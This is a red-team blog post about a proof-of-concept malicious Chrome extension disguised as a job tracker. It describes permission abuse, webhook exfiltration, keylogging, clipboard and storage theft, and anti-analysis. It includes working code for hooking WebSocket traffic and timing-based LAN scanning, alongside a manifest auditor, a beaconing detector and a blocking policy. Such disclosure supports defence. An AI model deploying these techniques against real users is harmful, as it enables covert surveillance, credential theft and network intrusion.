
The Wolf in Sheep's Clothing – A Red Team Browser Extension
Introduction
In the world of Red Teaming and offensive security, gaining initial access is often the hardest hurdle. Phishing emails are caught by filters, malicious binaries are sandboxed by EDRs, and physical access is risky. But there's one vector that remains dangerously effective and often overlooked: The Browser Extension.
Today, I'm releasing the technical details of Jobbo, a Proof-of-Concept (PoC) malicious browser extension I developed to demonstrate the terrifying capabilities of modern browser-based espionage.
On the surface, Jobbo is a helpful, friendly Chrome extension for job seekers that tracks their applications. It auto-fills forms on LinkedIn and Indeed, saves job descriptions, and organizes the job hunt. On paper, it is exactly the tool everyone wants.
Under the hood? It’s a full-featured surveillance suite capable of internal network mapping, credential harvesting, and real-time data exfiltration—all while bypassing traditional network defenses.
The Architecture of Deception
Jobbo is built on the modern Manifest V3 architecture, which Google promotes as "more secure", and it turns MV3's limitations into stealth features: an event-driven service worker that sits idle most of the time has a far smaller footprint than the persistent background pages of Manifest V2.
1. The Trojan Horse: manifest.json
The first step in any extension malware is permission creep. Jobbo justifies its existence by asking for:
- scripting: to "autofill" forms (actually used to inject payloads).
- cookies: to "save session state" (actually used to steal sessions).
- webNavigation & tabs: to "detect job pages" (actually used to track user activity).
- storage: to "save your jobs locally" (actually used to buffer stolen data).
By wrapping these permissions in a legitimate utility, users, and even some automated scanners, grant access without a second thought. Anyone reviewing the manifest should read host_permissions and the content_scripts match patterns alongside the permissions list: scripting and cookies only reach every site when those patterns cover <all_urls>, and a job tracker has no reason to need more than linkedin.com and indeed.com.
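The following is an added example, not Jobbo's code and not published with the post: a small reviewer-side audit that reads an MV3 manifest and scores the permission/host-access combination. The manifest object is a constructed stand-in assembled from the permissions the post lists, and the severity weights are an assumption.

```javascript
// Added example (not Jobbo's code): a reviewer-side audit of an MV3 manifest.
// The manifest below is a constructed stand-in built from the permissions the
// post lists; the post does not publish Jobbo's real manifest.json.
const jobboLikeManifest = {
  manifest_version: 3,
  name: "Jobbo - Job Application Tracker",
  permissions: ["scripting", "cookies", "webNavigation", "tabs", "storage"],
  host_permissions: ["<all_urls>"],
  content_scripts: [{ matches: ["<all_urls>"], js: ["script2.js"], run_at: "document_start" }],
  background: { service_worker: "background.js" },
};

// What each API permission buys an attacker once host access is broad.
const RISKY_PERMISSIONS = {
  scripting: "inject JavaScript into any page covered by host_permissions",
  cookies: "read cookies, including HttpOnly session cookies, for every matched host",
  webNavigation: "observe every URL the user visits, query strings included",
  tabs: "read tab URLs and titles; open or redirect tabs",
  storage: "buffer staged data locally (low risk on its own)",
};

// Match patterns that cover effectively every site.
const BROAD_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

function hasBroadHostAccess(manifest) {
  const patterns = [
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  return patterns.some((p) => BROAD_PATTERNS.has(p));
}

function auditManifest(manifest) {
  const perms = manifest.permissions || [];
  const broad = hasBroadHostAccess(manifest);
  const findings = [];
  for (const p of perms) {
    if (!RISKY_PERMISSIONS[p]) continue;
    // An API permission is only "high" when it can be exercised on every origin.
    const severity = broad && p !== "storage" ? "high" : "medium";
    findings.push({ item: p, severity, note: RISKY_PERMISSIONS[p] });
  }
  if (broad) {
    findings.push({
      item: "host access", severity: "high",
      note: "matches every origin, so each API permission above applies to every site",
    });
  }
  // MV3 detail: "scripting" alone injects nothing; it needs host_permissions
  // or activeTab. Watch optional_host_permissions, which can be requested later.
  if (perms.includes("scripting") && !broad && !perms.includes("activeTab")) {
    findings.push({
      item: "scripting", severity: "info",
      note: "cannot inject yet without host_permissions/activeTab; check optional_host_permissions",
    });
  }
  return findings;
}

// Assumed weights: high = 3, medium = 1, info = 0.
function riskScore(findings) {
  const weight = { high: 3, medium: 1, info: 0 };
  return findings.reduce((sum, f) => sum + weight[f.severity], 0);
}
```

Run against the stand-in manifest this yields six findings (five "high", one "medium") and a score of 16; a manifest that asks only for storage and no host access scores 1. The point of the score is triage, not verdict: a legitimate password manager will also score high, which is exactly why it deserves a closer look.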
2. The Puppet Master: background.js
This service worker is the brain of the operation. It manages the C2 (Command and Control) communications and orchestrates the data theft.
Key Capabilities:
- Stealth Exfiltration: Instead of suspicious HTTP requests to unknown IPs, Jobbo exfiltrates data via Telegram Bots and Discord Webhooks. To a network monitor, this traffic looks completely legitimate: TLS traffic to reputable domains that most allow-lists already permit. Only a proxy that logs full URLs (the /bot.../sendDocument and /api/webhooks/ paths) or one that watches for regular small POSTs from a workstation can tell it apart from a user chatting.
- Encrypted Queue: Data isn't sent immediately. It's queued, encrypted in local storage, and trickled out slowly to avoid traffic spikes that might trigger an IDS/IPS.
- Heartbeat & Killswitch: The extension checks a remote GitHub Gist or C2 server for a "kill switch" or configuration updates, allowing me to pivot targets or go silent instantly.
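The exfiltration pattern above also suggests the detection a defender would write. This is an added example, not from the post: a beaconing check over proxy logs that groups POSTs to webhook hosts by client and flags sources whose inter-request intervals are suspiciously regular. The log lines are constructed, and the line format ("<iso-time> <client-ip> <method> <url> <bytes>") is an assumption to adapt to your own proxy.

```javascript
// Added example (not Jobbo's code): beaconing detection for "trickle to a webhook".
// Constructed sample log; format "<iso-time> <client> <method> <url> <bytes>" is assumed.
const WEBHOOK_HOSTS = new Set(["api.telegram.org", "discord.com", "discordapp.com"]);

const SAMPLE_LOG = [
  // one workstation posting to a Telegram bot every ~5 minutes (the trickle)
  "2024-05-01T10:00:00Z 10.1.2.3 POST https://api.telegram.org/botREDACTED/sendDocument 2048",
  "2024-05-01T10:02:00Z 10.1.2.3 GET https://www.linkedin.com/jobs/view/1 0",
  "2024-05-01T10:05:02Z 10.1.2.3 POST https://api.telegram.org/botREDACTED/sendDocument 1980",
  "2024-05-01T10:10:01Z 10.1.2.3 POST https://api.telegram.org/botREDACTED/sendDocument 2100",
  "2024-05-01T10:15:03Z 10.1.2.3 POST https://api.telegram.org/botREDACTED/sendDocument 2010",
  "2024-05-01T10:20:00Z 10.1.2.3 POST https://api.telegram.org/botREDACTED/sendDocument 2055",
  // a human posting to a Discord webhook at irregular times (must not flag)
  "2024-05-01T10:00:30Z 10.1.2.9 POST https://discord.com/api/webhooks/123/abc 640",
  "2024-05-01T10:03:00Z 10.1.2.9 POST https://discord.com/api/webhooks/123/abc 900",
  "2024-05-01T10:47:12Z 10.1.2.9 POST https://discord.com/api/webhooks/123/abc 12000",
  "2024-05-01T12:05:40Z 10.1.2.9 POST https://discord.com/api/webhooks/123/abc 300",
];

function parseLine(line) {
  const [ts, client, method, url, bytes] = line.trim().split(/\s+/);
  return {
    t: Date.parse(ts) / 1000, // seconds since epoch
    client,
    method,
    host: new URL(url).hostname,
    bytes: Number(bytes),
  };
}

// Mean inter-request gap and its coefficient of variation (stddev / mean).
// A scheduled trickle has a CV near 0; a human's posts are all over the place.
function intervalStats(times) {
  const sorted = [...times].sort((a, b) => a - b);
  const gaps = sorted.slice(1).map((t, i) => t - sorted[i]);
  const mean = gaps.reduce((s, g) => s + g, 0) / gaps.length;
  const variance = gaps.reduce((s, g) => s + (g - mean) ** 2, 0) / gaps.length;
  return { mean, cv: Math.sqrt(variance) / mean };
}

function findBeacons(lines, { minRequests = 4, maxCv = 0.2 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (e.method !== "POST" || !WEBHOOK_HOSTS.has(e.host)) continue;
    const key = `${e.client} ${e.host}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e);
  }
  const hits = [];
  for (const [key, events] of groups) {
    if (events.length < minRequests) continue;
    const { mean, cv } = intervalStats(events.map((e) => e.t));
    if (cv > maxCv) continue;
    const [client, host] = key.split(" ");
    hits.push({
      client,
      host,
      count: events.length,
      meanIntervalSec: Math.round(mean),
      cv: Number(cv.toFixed(3)),
      totalBytes: events.reduce((s, e) => s + e.bytes, 0),
    });
  }
  return hits;
}
```

On the sample, only 10.1.2.3 to api.telegram.org is flagged: five POSTs at a mean gap of 300 s with a CV of about 0.007. The Discord user has four POSTs too, but a CV above 0.7 rules them out. A real implementation would add jitter tolerance (Jobbo could randomize its schedule) and compare against the host's baseline for that user; the size channel, many similar-sized uploads, is a second signal worth keeping.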
3. The Eyes and Ears: script2.js (The Content Script)
This is where the magic happens. Injected into every page, this script is a heavy-duty surveillance tool.
- WebSocket Interceptor: It hooks window.WebSocket and intercepts real-time traffic. This is devastating for modern applications like Slack, Discord, or trading platforms, allowing Jobbo to read chat messages and financial data as they arrive. (A content script's isolated world has its own WebSocket binding, so the hook only reaches the page's sockets when the script runs in the page's main world, which MV3 permits through the content script's world: "MAIN" setting or chrome.scripting.executeScript.)
- IndexedDB Pillager: It scans for and extracts data from local IndexedDB databases. Because a content script shares the page's origin for storage APIs, this gives offline access to emails (Gmail offline mode), documents (Notion), and chat logs (WhatsApp Web).
- DOM Scraper & Keylogger: It passively records keystrokes in sensitive fields and scrapes the DOM for patterns matching credit cards, API keys (sk_live_...), and private keys.
- Clipboard Snatcher: Monitors the clipboard for copied passwords or 2FA codes.
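To make the WebSocket interceptor concrete, here is an added example of the hooking pattern (not Jobbo's code, which the post does not publish). The StandInWebSocket class, the MsgEvent helper, the chat.example URL and demo() are constructed so the block runs outside a browser; in an extension the same hookWebSocket() would run in the page's main world against the real window.WebSocket.

```javascript
// Added example (not Jobbo's code): hooking window.WebSocket in both directions.
// StandInWebSocket/MsgEvent are constructed stand-ins so this runs in Node.

class MsgEvent extends Event {
  constructor(data) { super("message"); this.data = data; }
}
// Just enough of the WebSocket surface for the hook to act on.
class StandInWebSocket extends EventTarget {
  constructor(url) { super(); this.url = url; this.sent = []; }
  send(data) { this.sent.push(data); }
  receive(data) { this.dispatchEvent(new MsgEvent(data)); } // simulates a server frame
}
globalThis.WebSocket = StandInWebSocket;

// Wrap the global constructor so every socket the page opens reports both
// directions into `sink`. Returns a function that undoes the hook.
function hookWebSocket(target = globalThis, sink = []) {
  const Original = target.WebSocket;
  const originalSend = Original.prototype.send;

  function HookedWebSocket(url, protocols) {
    const ws = protocols === undefined ? new Original(url) : new Original(url, protocols);
    // Register before the page's own handlers so no incoming frame is missed.
    ws.addEventListener("message", (ev) => sink.push({ dir: "in", url: ws.url, data: ev.data }));
    return ws;
  }
  // Keep instanceof checks and static constants (OPEN, CLOSED, ...) working.
  HookedWebSocket.prototype = Original.prototype;
  Object.setPrototypeOf(HookedWebSocket, Original);

  // Outgoing frames: patching the shared prototype also covers sockets the
  // page created before the hook was installed.
  Original.prototype.send = function (data) {
    sink.push({ dir: "out", url: this.url, data });
    return originalSend.call(this, data);
  };

  target.WebSocket = HookedWebSocket;
  return function unhook() {
    Original.prototype.send = originalSend;
    target.WebSocket = Original;
  };
}

// A page-side integrity check a defender can ship: a native constructor prints
// "[native code]", a JavaScript wrapper does not. (With the stand-in above the
// result is only meaningful after hooking, since the stand-in is not native either.)
function webSocketLooksHooked(target = globalThis) {
  return !/\[native code\]/.test(Function.prototype.toString.call(target.WebSocket));
}

function demo() {
  const captured = [];
  const unhook = hookWebSocket(globalThis, captured);
  const ws = new WebSocket("wss://chat.example/socket"); // constructed URL
  ws.send('{"type":"msg","text":"wire 5000 USD"}');
  ws.receive('{"type":"msg","text":"done"}');
  const hooked = webSocketLooksHooked();
  const isInstance = ws instanceof WebSocket;
  unhook();
  return { captured, hooked, isInstance, restored: globalThis.WebSocket === StandInWebSocket };
}
```

demo() returns two captured frames, one outbound and one inbound, and shows that the hooked constructor still satisfies instanceof. The toString check is cheap to add to a sensitive web app's own bootstrap code, but note its limit: an extension that runs at document_start in the main world can also patch Function.prototype.toString, so treat it as one signal, not proof.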
4. Internal Network Scanning
Perhaps the most dangerous feature is the LAN scan. Using fetch() timing attacks (a refused connection fails fast, an unused address only times out, and a live web server answers even though the response is opaque to the page) and WebRTC local IP discovery where the browser still exposes raw private addresses (modern Chrome substitutes mDNS .local candidates unless policy restores the real IPs), Jobbo maps the user's internal network (192.168.x.x). It looks for common internal dashboards like Jenkins, Jira, or git servers, potentially turning an external compromise into an internal pivot point. Anyone reproducing this should test on the browser version in scope: Chrome's Private Network Access restrictions keep tightening which of these probes a page context may send at all, and Chrome refuses to connect to its unsafe-port list (22, 25 and others) before sending a packet, so those ports always look closed.
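The timing side of that scan, as an added example rather than Jobbo's own code: probeHost() fires a no-cors fetch with a timeout and classifies the target by how the promise settles. makeFakeFetch and the fakeLan table are constructed stand-ins so the block runs offline; in an extension you would omit fetchImpl and let the browser's fetch do the work.

```javascript
// Added example (not Jobbo's code): timing-based LAN probe from the browser.
// The page cannot read a cross-origin response from 192.168.x.x, but the
// fetch() promise still reveals how the request ended.

// "resolved": something answered HTTP (an opaque no-cors response still resolves)
// "timeout":  nobody home, or a firewall silently dropped the SYN
// "rejected": the stack answered quickly, typically a refused port, so the host is up
function classify(outcome) {
  if (outcome === "resolved") return "alive";
  if (outcome === "timeout") return "filtered";
  return "closed";
}

async function probeHost(url, { fetchImpl = globalThis.fetch, timeoutMs = 1500 } = {}) {
  const ctrl = new AbortController();
  let outcome = "rejected";
  const timer = setTimeout(() => { outcome = "timeout"; ctrl.abort(); }, timeoutMs);
  const start = Date.now();
  try {
    await fetchImpl(url, { mode: "no-cors", cache: "no-store", signal: ctrl.signal });
    outcome = "resolved";
  } catch (_) {
    // refused/reset leaves "rejected"; our own abort already set "timeout"
  } finally {
    clearTimeout(timer);
  }
  return { url, elapsedMs: Date.now() - start, status: classify(outcome) };
}

// A real scanner walks 192.168.x.1-254 on a few web ports (80, 443, 8080, 8443, ...).
function scanHosts(urls, opts) {
  return Promise.all(urls.map((url) => probeHost(url, opts)));
}

// Constructed stand-in for fetch: the table decides how each target behaves.
function makeFakeFetch(table) {
  return (url, { signal }) =>
    new Promise((resolve, reject) => {
      const spec = table[url]; // absent => never answers
      let timer = null;
      if (spec) {
        timer = setTimeout(
          () => (spec.up ? resolve({ type: "opaque" }) : reject(new TypeError("Failed to fetch"))),
          spec.delayMs,
        );
      }
      signal.addEventListener("abort", () => {
        if (timer) clearTimeout(timer);
        reject(new Error("AbortError"));
      });
    });
}

const fakeLan = {
  "http://192.168.1.1/": { up: true, delayMs: 20 },       // router admin UI
  "http://192.168.1.10:8080/": { up: true, delayMs: 30 }, // something like Jenkins
  "http://192.168.1.10:3000/": { up: false, delayMs: 5 }, // host up, port refused
  // 192.168.1.200 is deliberately absent: no host there, so the probe times out
};

function demoScan() {
  const targets = [...Object.keys(fakeLan), "http://192.168.1.200/"];
  return scanHosts(targets, { fetchImpl: makeFakeFetch(fakeLan), timeoutMs: 100 });
}
```

demoScan() reports the router and the :8080 service as alive, :3000 as closed (which still tells the attacker the host exists) and 192.168.1.200 as filtered. Against real targets the timeout must be tuned per network, and the caveats above apply: Chrome's Private Network Access rules and unsafe-port list shape what a page context can even attempt, which is why a scanner of this kind prefers to run from the extension's service worker when it holds host permissions for the private ranges.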
5. Anti-Analysis
Jobbo knows when it's being watched. It employs several anti-analysis techniques:
- DevTools Detection: It watches for the gap between window.outerWidth/innerWidth (and the height pair) that appears when Developer Tools dock into the window, and for console timing differences, to decide whether DevTools are open. If they are, it disables its malicious routines and behaves like a normal extension. (Undocked DevTools change no window dimensions, so the size check alone is not reliable.)
- Obfuscation: The source code is heavily obfuscated with string arrays, hex encoding, and control flow flattening to frustrate reverse engineering.
Conclusion
Jobbo demonstrates that the browser is the new operating system, and extensions are its kernel modules. As defenders, we must look beyond the endpoint and secure the browser environment. Corporate policies should strictly limit extension installation (Chrome's ExtensionInstallBlocklist/ExtensionInstallAllowlist and ExtensionSettings enterprise policies can block everything that is not explicitly approved, and chrome://policy shows whether they actually applied), and EDR solutions need to evolve to inspect extension behavior more deeply.
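As an added example of that allow-list approach (not part of the original post), the Chrome enterprise ExtensionSettings policy below blocks every extension except one approved ID. The extension ID is a hypothetical placeholder; on Linux the JSON goes in a file under /etc/opt/chrome/policies/managed/, and on Windows and macOS the same keys are delivered through registry or plist policy.

```json
{
  "ExtensionSettings": {
    "*": {
      "installation_mode": "blocked",
      "blocked_install_message": "Extensions must be approved by Security. Request one through the service desk."
    },
    "<approved-extension-id>": {
      "installation_mode": "allowed"
    }
  }
}
```

Extensions the organization requires can use "force_installed" with an "update_url" in the same map, and anything already installed that falls under the "*" block is disabled at the next policy refresh. Verify in chrome://policy that the setting shows no errors; a policy that loads with a syntax error silently enforces nothing.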
Disclaimer: Jobbo is a research tool created for educational and defensive testing purposes only. Misuse of this code is illegal.
Credits & Acknowledgements
This research and proof-of-concept were inspired in part by the work and writings of Faris Faisal (0xFF), whose explorations into browser-based attack surfaces and offensive security research helped shape the conceptual and technical direction of this project.
You can find his work and insights here:
🔗 https://medium.com/@frsfaisall
Please do check him out; he's a really great guy!